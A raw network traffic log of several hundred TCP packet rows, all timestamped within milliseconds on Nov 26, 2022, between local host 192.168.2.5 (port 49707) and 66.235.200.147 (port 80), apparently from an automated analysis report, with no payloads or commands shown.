Nov 26, 2022 11:17:42.695818901 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.695837975 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.695856094 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.695858955 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.695873976 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.695879936 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.695890903 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.695904016 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.696285009 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.696304083 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.696320057 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.696336985 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.696348906 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.696355104 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.696374893 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.696384907 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.696480036 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.696496964 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.696515083 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.696532011 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.696541071 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.696548939 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.696568012 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.696578979 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.696584940 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.696602106 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.696619034 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.696638107 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.696645021 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.696645021 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.696655989 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.696674109 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.696683884 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.696691036 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.696710110 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.696726084 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.696738958 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.696743965 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.696762085 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.696765900 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.696779013 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.696785927 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.696796894 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.696815014 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.697222948 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.697242022 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.697259903 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.697272062 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.697278976 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.697297096 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.697298050 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.697315931 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.697338104 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.697364092 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.697381973 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.697401047 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.697418928 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.697422981 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.697437048 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.697443962 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.697475910 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.697566032 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.697585106 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.697602034 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.697621107 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.697628975 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.697639942 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.697659016 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.697665930 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.697676897 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.697700024 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.697706938 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.697724104 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.697741985 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.697793961 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.697958946 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.697976112 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.698023081 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.698107958 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.698124886 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.698143005 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.698159933 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.698170900 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.698178053 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.698195934 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.698304892 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.698343992 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.698362112 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.698368073 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.698379040 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.698395967 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.698406935 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.698412895 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.698431969 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.698436022 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.698447943 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.698473930 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.698506117 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.698522091 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.698539972 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.698556900 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.698564053 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.698574066 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.698586941 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.698590994 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.698609114 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.698611021 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.698627949 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.698645115 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.698652983 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.698851109 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.698868990 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.698915005 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.698940992 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.699052095 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.699069977 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.699085951 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.699104071 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.699120045 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.699127913 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.699136972 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.699147940 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.699155092 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.699172020 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.699187994 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.699188948 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.699207067 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.699217081 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.699238062 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.699248075 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.699255943 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.699273109 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.699290037 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.699291945 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.699306965 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.699326038 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.699335098 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.699343920 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.699367046 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.699445009 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.699461937 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.699479103 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.699484110 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.699496984 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.699515104 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.699516058 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.699562073 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.699752092 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.699769974 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.699785948 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.699803114 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.699816942 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.699846029 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.699975967 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.699992895 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.700011015 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.700028896 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.700045109 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.700062990 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.700063944 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.700079918 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.700088978 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.700098038 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.700104952 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.700117111 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.700134039 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.700146914 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.700180054 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.700196981 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.700213909 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.700221062 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.700231075 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.700244904 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.700249910 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.700269938 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.700315952 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.700331926 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.700349092 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.700357914 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.700366974 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.700403929 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.700483084 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.700527906 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.700696945 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.700715065 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.700930119 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.700948000 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.700964928 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.700978041 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.700982094 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.700999975 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.701013088 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.701018095 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.701034069 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.701035023 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.701055050 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.701061010 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.701073885 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.701093912 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.701101065 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.701112032 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.701149940 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.701230049 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.701247931 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.701266050 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.701276064 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.701283932 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.701301098 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.701304913 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.701349974 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.701477051 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.701494932 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.701514006 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.701531887 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.701545000 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.701550961 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.701569080 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.701577902 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.701611996 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.701667070 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.701684952 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.701812983 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.701863050 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.701880932 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.701900005 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.701919079 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.701936007 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.701936960 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.701956034 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.701958895 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.701973915 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.701992989 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.702011108 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.702013016 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.702028990 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.702038050 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.702048063 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.702073097 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.702078104 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.702114105 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.702244043 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.702284098 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.702301979 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.702322006 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.702339888 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.702358007 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.702359915 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.702369928 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.702377081 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.702394962 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.702404976 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.702430964 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.702449083 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.702471972 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.702497959 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.702775955 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.702794075 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.702815056 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.702832937 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.702852011 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.702853918 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.702871084 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.702892065 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.702902079 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.702919960 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.702925920 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.703012943 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.703032017 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.703051090 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.703053951 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.703068972 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.703078032 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.703088045 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.703113079 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.703233004 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.703252077 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.703269958 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.703274012 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.703289986 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.703309059 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.703327894 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.703346014 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.703349113 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.703357935 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.703362942 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.703382969 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.703388929 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.703401089 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.703418016 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.703418970 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.703437090 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.703449965 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.703504086 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.703814983 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.703984022 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.704003096 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.704020977 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.704040051 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.704058886 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.704058886 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.704077959 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.704096079 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.704113960 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.704116106 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.704133034 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.704150915 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.704168081 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.704169035 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.704188108 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.704206944 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.704212904 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.704224110 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.704231024 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.704241991 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.704260111 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.704269886 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.704278946 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.704296112 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.704299927 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.704313993 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.704333067 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.704351902 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.704351902 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.704370975 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.704375029 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.704389095 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.704396009 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.704407930 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.704411030 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.704447031 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.704631090 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.704972982 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.704993010 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.705012083 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.705030918 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.705049038 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.705054045 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.705069065 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.705075026 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.705086946 CET	80	49707	66.235.200.147	192.168.2.5
